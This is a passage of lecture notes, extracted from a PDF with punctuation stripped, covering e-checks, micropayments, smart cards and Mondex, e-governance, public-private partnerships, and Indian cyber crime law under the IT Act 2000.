The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
